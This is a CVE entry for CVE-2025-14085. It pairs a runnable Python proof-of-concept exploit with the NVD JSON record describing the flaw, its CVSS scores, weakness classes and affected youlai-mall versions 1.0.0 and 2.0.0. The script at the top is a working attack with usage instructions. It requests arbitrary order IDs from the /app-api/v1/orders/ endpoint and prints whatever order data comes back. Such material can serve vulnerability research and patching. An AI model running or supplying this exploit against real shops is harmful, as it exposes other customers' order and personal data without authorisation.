CVE-2025-14085

import requests import sys # CVE-2025-14085 PoC - youlai-mall Order Information Disclosure # Target: /app-api/v1/orders/{orderId} def exploit_cve_2025_14085(target_url, order_id): """ Exploit for improper control of dynamically-identified variables in youlai-mall order API endpoint """ endpoint = f"{target_url.rstrip('/')}/app-api/v1/orders/{order_id}" headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)', 'Accept': 'application/json', 'Content-Type': 'application/json' } try: response = requests.get(endpoint, headers=headers, timeout=10) if response.status_code == 200: data = response.json() print(f"[!] Successfully accessed order {order_id}") print(f"[*] Response: {data}") return True elif response.status_code == 403: print(f"[*] Order {order_id} access denied (403)") else: print(f"[*] Order {order_id} - Status: {response.status_code}") except Exception as e: print(f"[!] Error: {e}") return False if __name__ == "__main__": if len(sys.argv) < 3: print("Usage: python cve-2025-14085.py <target_url> <order_id>") print("Example: python cve-2025-14085.py http://target.com 12345") sys.exit(1) target = sys.argv[1] order_id = sys.argv[2] exploit_cve_2025_14085(target, order_id)

{"cve": {"id": "CVE-2025-14085", "sourceIdentifier": "[email protected]", "published": "2025-12-05T14:15:48.633", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability has been found in youlaitech youlai-mall 1.0.0/2.0.0. This impacts an unknown function of the file /app-api/v1/orders/. The manipulation of the argument orderId leads to improper control of dynamically-identified variables. Remote exploitation of the attack is possible. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.1, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "baseScore": 6.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "baseScore": 6.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 8.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-913"}, {"lang": "en", "value": "CWE-914"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:youlai:youlai-mall:1.0.0:*:*:*:*:*:*:*", "matchCriteriaId": "CDAC2C90-64E9-4C14-BDC5-36F1178708EB"}, {"vulnerable": true, "criteria": "cpe:2.3:a:youlai:youlai-mall:2.0.0:*:*:*:*:*:*:*", "matchCriteriaId": "1E843DD0-1FE2-4487-B584-A33F72DDCBDF"}]}]}], "references": [{"url": "https://github.com/Hwwg/cve/issues/23", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Third Party Advisory"]}, {"url": "https://vuldb.com/?ctiid.334476", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.334476", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.695943", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}]}}